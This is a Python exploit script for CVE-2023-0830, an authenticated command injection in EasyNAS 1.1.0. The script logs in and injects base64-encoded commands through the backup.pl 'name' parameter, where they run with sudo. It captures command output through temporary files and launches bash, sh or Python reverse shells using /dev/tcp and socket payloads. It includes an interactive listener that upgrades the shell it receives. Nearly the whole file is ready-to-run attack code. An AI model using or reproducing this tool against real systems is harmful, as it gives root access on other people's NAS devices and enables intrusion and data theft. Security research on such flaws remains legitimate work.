#!/usr/bin/env python3 import requests import argparse import sys import base64 import urllib.parse import time import re import socket import threading import select import termios import tty import os import random import string from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) verbose = False def log_info(message): print(f"[i] {message}") def log_success(message): print(f"[+] {message}") def log_error(message): print(f"[-] {message}") def log_verbose(message): if verbose: print(f"[v] {message}") def login(url, username, password, protocol="https", skip_verify=True): """Login to the EasyNAS web interface""" try: log_info(f"Attempting to login as {username} at {protocol}://{url}...") # Create a session session = requests.Session() # Disable SSL verification if requested session.verify = not skip_verify # Send the login request login_url = f"{protocol}://{url}/easynas/login.pl" # These are the actual field names in the EasyNAS login form login_data = { 'usr': username, 'pwd': password, 'action': 'login' } headers = { 'User-Agent': 'Mozilla/5.0 Gecko/20100101 Firefox/72.0' } # Try HTTPS first try: response = session.post(login_url, data=login_data, headers=headers, timeout=5) # Check for login failure indications if 'Login to EasyNAS' in response.text: log_error("Login failed: Invalid credentials or server error") return None # A less strict check for success - if we don't see the login page again log_success("Login successful") return session except requests.exceptions.SSLError: # If HTTPS fails with SSL error and protocol is https, try HTTP if protocol == "https": log_info("SSL error, trying HTTP instead...") return login(url, username, password, "http", skip_verify) except requests.exceptions.ConnectionError: # If HTTPS connection fails and protocol is https, try HTTP if protocol == "https": log_info("Connection error, trying HTTP instead...") return login(url, username, password, "http", skip_verify) except Exception as e: log_error(f"Login failed: {str(e)}") return None except Exception as e: log_error(f"Login failed: {str(e)}") return None def execute_command(session, url, command, protocol="https"): """Execute a command on the target using the original technique""" try: # Encode the command in base64 - exactly like original exploit encoded_cmd = base64.b64encode(command.encode()).decode() # Construct the exploit URL - EXACTLY as in the original exploit exploit_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{encoded_cmd}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23' log_verbose(f"Sending request to: {exploit_url}") # Execute the command response = session.get( exploit_url, headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout=10, verify=False ) if response.status_code != 200: return f"Error: HTTP status code {response.status_code}" # Different patterns to try to extract command output patterns = [ re.compile(r'backup name is invalid\s*
(.*?)', re.DOTALL), # Main pattern re.compile(r'backup name is invalid\s*
(.*?)$', re.DOTALL), # Alternative pattern re.compile(r'backup name is invalid\s*(.*?)', re.DOTALL), # Fallback pattern re.compile(r'
(.*?)
', re.DOTALL), # Error message pattern ] # Try all patterns for pattern in patterns: match = pattern.search(response.text) if match: output = match.group(1).strip() if output: return output # If no output was captured, try a fallback approach using a temporary file # This creates a two-stage approach log_verbose("No output captured in response, trying two-stage approach") # Generate a unique filename tmp_file = f"/tmp/out_{int(time.time())}_{random.randint(1000, 9999)}.txt" # Execute the command and redirect output to the temporary file stage1_cmd = f"{command} > {tmp_file} 2>&1" encoded_stage1 = base64.b64encode(stage1_cmd.encode()).decode() # Construct the exploit URL - exactly as in the original exploit stage1_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{encoded_stage1}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23' log_verbose(f"Sending stage 1 request to: {stage1_url}") # Execute the first stage session.get( stage1_url, headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout=10, verify=False ) # Now read the temporary file read_cmd = f"cat {tmp_file}" encoded_read = base64.b64encode(read_cmd.encode()).decode() # Construct the exploit URL - exactly as in the original exploit read_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{encoded_read}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23' log_verbose(f"Sending read request to: {read_url}") # Execute the read command read_response = session.get( read_url, headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout=10, verify=False ) # Try to extract output for pattern in patterns: match = pattern.search(read_response.text) if match: output = match.group(1).strip() if output: # Clean up the temporary file cleanup_cmd = f"rm -f {tmp_file}" encoded_cleanup = base64.b64encode(cleanup_cmd.encode()).decode() cleanup_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{encoded_cleanup}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23' session.get(cleanup_url, headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, verify=False) return output # If we still don't have output, return a generic message return "Command executed, but no output was captured" except Exception as e: return f"Error: {str(e)}" class IntegratedListener: def __init__(self, host='0.0.0.0', port=4444): self.host = host self.port = port self.socket = None self.client = None self.running = False self.original_terminal_settings = None self.shell_upgraded = False def start(self): """Start the listener in a separate thread""" self.running = True self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) try: self.socket.bind((self.host, self.port)) self.socket.listen(1) log_success(f"Listener started on {self.host}:{self.port}") log_info("Waiting for incoming connection...") # Set a timeout so we can check for stop flag self.socket.settimeout(1) while self.running: try: self.client, addr = self.socket.accept() log_success(f"Received connection from {addr[0]}:{addr[1]}") self.handle_client() break except socket.timeout: continue except Exception as e: log_error(f"Error accepting connection: {e}") break except Exception as e: log_error(f"Error starting listener: {e}") finally: self.stop() def stop(self): """Stop the listener""" self.running = False # Reset terminal settings self._reset_terminal() if self.client: try: self.client.close() except: pass self.client = None if self.socket: try: self.socket.close() except: pass self.socket = None def _reset_terminal(self): """Reset terminal settings to original state""" if self.original_terminal_settings: try: # First print a newline to ensure we're at the start of a line sys.stdout.write("\n") sys.stdout.flush() # Reset terminal to normal mode termios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.original_terminal_settings) # Additional terminal cleanup os.system('stty sane') os.system('reset') except Exception as e: if verbose: print(f"Error resetting terminal: {e}") def handle_client(self): """Handle the client connection with an interactive shell""" if not self.client: return log_success("Shell connection established!") log_info("Interactive shell session started") log_info("Type 'exit' or press Ctrl+C to exit") # Set terminal to raw mode for better interactive experience try: # Save current terminal settings self.original_terminal_settings = termios.tcgetattr(sys.stdin) # Set terminal to raw mode tty.setraw(sys.stdin.fileno()) # Basic terminal setup if hasattr(os, 'system'): os.system('stty -echo') except Exception as e: log_verbose(f"Error setting terminal to raw mode: {e}") try: # Send initial commands to fix the terminal self._fix_remote_terminal() # Create two threads for sending and receiving data threading.Thread(target=self._send_data, daemon=True).start() self._receive_data() except KeyboardInterrupt: log_info("\nKeyboard interrupt received, closing connection") except Exception as e: log_error(f"\nError in shell session: {e}") finally: self.stop() def _fix_remote_terminal(self): """Send commands to fix the remote terminal""" if not self.client: return # Reset terminal and set up a proper environment time.sleep(0.5) # Get local terminal size for better experience try: # Get terminal size terminal_size = os.get_terminal_size() rows = terminal_size.lines cols = terminal_size.columns except: # Default if we can't get the size rows = 24 cols = 80 # First, send a basic cleanup sequence try: # Clear any pending input self.client.send(b"\n") time.sleep(0.1) except: pass # Try different approaches to fix the terminal shell_fix_commands = [ # Try to fix the terminal in various ways "\r\n", "TERM=xterm-256color\n", "export TERM=xterm-256color\n", f"stty rows {rows} columns {cols}\n", # Method 1: Use script command "which script >/dev/null 2>&1 && (script -q /dev/null)\n", # Method 2: Use python pty "which python3 >/dev/null 2>&1 && python3 -c 'import pty; pty.spawn(\"/bin/bash\")' || which python >/dev/null 2>&1 && python -c 'import pty; pty.spawn(\"/bin/bash\")'\n", # Reset CTRL-C handling "stty intr ^C\n", # Set prompt to something simple and clean "PS1='\\$ '\n", "clear\n", "echo Shell stabilized\n" ] # Send each command with a small delay for cmd in shell_fix_commands: try: self.client.send(cmd.encode()) time.sleep(0.2) except: pass # Final cleanup try: self.client.send(b"clear\n") except: pass time.sleep(0.3) # Wait for commands to take effect def _send_data(self): """Send data from stdin to the client""" try: while self.running and self.client: # Check if there's data to read from stdin r, _, _ = select.select([sys.stdin], [], [], 0.1) if r: data = os.read(sys.stdin.fileno(), 1024) if not data: break self.client.send(data) except: pass def _receive_data(self): """Receive data from client and write to stdout""" try: buffer = b"" while self.running and self.client: # Check if there's data to read from the client r, _, _ = select.select([self.client], [], [], 0.1) if r: data = self.client.recv(1024) if not data: log_info("\nConnection closed by remote host") break # Process data to handle terminal control sequences buffer += data # Write data to stdout os.write(sys.stdout.fileno(), data) # Look for error messages and handle them if b"cannot set terminal process group" in buffer: # This is a common error in reverse shells # Send additional commands to fix terminal issues time.sleep(0.5) self.client.send(b"export TERM=xterm\n") self.client.send(b"stty raw -echo\n") self.client.send(b"reset\n") time.sleep(0.5) # Try to reset with a clean buffer buffer = b"" # If we detect a shell prompt, try to upgrade it if (b"$ " in buffer or b"# " in buffer or b"sh-" in buffer) and b"python" not in buffer: if b"bash" not in buffer and b"pty" not in buffer: time.sleep(0.3) # Try to upgrade to a better shell if we haven't already self.client.send(b"which python3 && python3 -c 'import pty; pty.spawn(\"/bin/bash\")' || which python && python -c 'import pty; pty.spawn(\"/bin/bash\")'\n") time.sleep(0.3) self.client.send(b"export TERM=xterm\n") self.client.send(b"stty rows 24 columns 80\n") self.client.send(b"clear\n") buffer = b"" except: pass def reverse_shell(session, url, listener_ip, listener_port, protocol="https", integrated_listener=False, shell_type="bash"): """ Create a reverse shell connection to the specified listener If integrated_listener is True, will start a listener in the script itself shell_type can be one of: bash, sh, python """ if integrated_listener: # Check if the listener IP is valid for receiving connections if listener_ip in ['0.0.0.0', '127.0.0.1', 'localhost']: log_info("Using local listener - determining external IP") # Try to determine external IP or use default interface try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) listener_ip = s.getsockname()[0] s.close() log_success(f"Using {listener_ip} as listener address") except: log_error("Could not determine external IP") log_info("Please specify your actual IP address with --lhost") return False # Start the integrated listener in a separate thread listener = IntegratedListener(host='0.0.0.0', port=listener_port) listener_thread = threading.Thread(target=listener.start) listener_thread.daemon = True listener_thread.start() # Wait a moment for the listener to start time.sleep(1) try: log_info(f"Sending reverse shell to {listener_ip}:{listener_port}...") # Create the reverse shell payload if integrated_listener: # Choose payload based on shell_type if shell_type == "python": # Python-based shell with pty support python_script = f''' import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("{listener_ip}",{listener_port})) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) import pty pty.spawn("/bin/bash") ''' encoded_script = base64.b64encode(python_script.encode()).decode() payload = f"python3 -c \"import base64,sys;exec(base64.b64decode('{encoded_script}').decode())\" || python -c \"import base64,sys;exec(base64.b64decode('{encoded_script}').decode())\" || /bin/bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1" elif shell_type == "bash": # Bash reverse shell with some additional settings for better experience payload = f"bash -c 'exec bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1'" else: # sh # Basic sh reverse shell payload = f"/bin/sh -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1" else: # Standard shell for normal netcat payload = f"/bin/sh -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1" # Encode the payload in base64 - exactly like original payload = base64.b64encode(payload.encode()).decode() # URL encode the payload - exactly like original payload = urllib.parse.quote(payload) # Construct the exploit URL - EXACTLY as in the original exploit # The key part is: echo+{base64_payload}+|+base64+-d+|+sudo+sh+||a+# exploit_url = f'{protocol}://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23' log_verbose(f"Sending request to: {exploit_url}") # Set timeout as in the original exploit timeout = 3 try: # Try the main reverse shell payload log_verbose("Sending reverse shell payload with timeout=" + str(timeout)) session.get( exploit_url, headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout=timeout, verify=False ) log_error("Request completed without timeout - shell may have failed") except requests.exceptions.ReadTimeout: # This is expected as in the original exploit log_success("Timeout occurred as expected - connection should be established") if integrated_listener: # Keep the main thread alive until the listener thread exits while listener_thread.is_alive(): try: time.sleep(0.5) except KeyboardInterrupt: log_info("\nKeyboard interrupt received, stopping listener") listener.stop() break return True except requests.exceptions.RequestException as e: log_success(f"Connection interrupted - check your listener: {e}") # Give guidance if it doesn't work immediately if not integrated_listener: log_info("If you don't receive a connection, try these alternatives:") log_info("1. Make sure your listener is running: nc -lvnp " + str(listener_port)) log_info("2. Try using HTTP protocol instead of HTTPS with --protocol http") log_info("3. Ensure there are no firewalls blocking the connection") return True except Exception as e: log_error(f"Error setting up reverse shell: {str(e)}") return False def main(): global verbose print(r""" EasyNAS 1.1.0 Authenticated Command Injection - CVE-2023-0830 Created by Ivan Spiridonov (xbz0n) https://xbz0n.sh """) parser = argparse.ArgumentParser(description='EasyNAS 1.1.0 Authenticated Command Injection Exploit') parser.add_argument('url', help='Target URL with or without protocol (e.g., example.com:8080)') parser.add_argument('username', help='EasyNAS username') parser.add_argument('password', help='EasyNAS password') parser.add_argument('--mode', choices=['shell', 'reverse'], default='shell', help='Exploitation mode: shell (integrated reverse shell) or reverse (external listener) (default: shell)') parser.add_argument('--lhost', help='IP address for the reverse shell listener (your IP, auto-detected by default)') parser.add_argument('--lport', type=int, default=4444, help='Port for the reverse shell listener (default: 4444)') parser.add_argument('--protocol', choices=['http', 'https'], default='https', help='Protocol to use (default: https)') parser.add_argument('--verbose', action='store_true', help='Enable verbose output') parser.add_argument('--shell', choices=['bash', 'sh', 'python'], default='bash', help='Specify the shell type to use with integrated listener (default: bash)') args = parser.parse_args() verbose = args.verbose target_url = args.url if target_url.startswith("http://") or target_url.startswith("https://"): log_verbose(f"Stripping protocol from URL: {target_url}") target_url = target_url.split("://")[1] log_verbose(f"Target URL: {target_url}") log_verbose(f"Using protocol: {args.protocol}") if args.mode == 'reverse' and (not args.lhost or not args.lport): log_error("External reverse shell requires both --lhost and --lport") parser.print_help() sys.exit(1) session = login(target_url, args.username, args.password, args.protocol) if not session: sys.exit(1) if args.mode == 'shell': if not args.lhost: try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) args.lhost = s.getsockname()[0] s.close() log_success(f"Using {args.lhost} as listener address") except: args.lhost = '0.0.0.0' log_info(f"Starting integrated reverse shell on port {args.lport}") reverse_shell(session, target_url, args.lhost, args.lport, args.protocol, integrated_listener=True, shell_type=args.shell) elif args.mode == 'reverse': log_info(f"Sending reverse shell to external listener at {args.lhost}:{args.lport}") log_info("Make sure you have a listener running with: nc -lvnp " + str(args.lport)) reverse_shell(session, target_url, args.lhost, args.lport, args.protocol, integrated_listener=False) if __name__ == "__main__": main()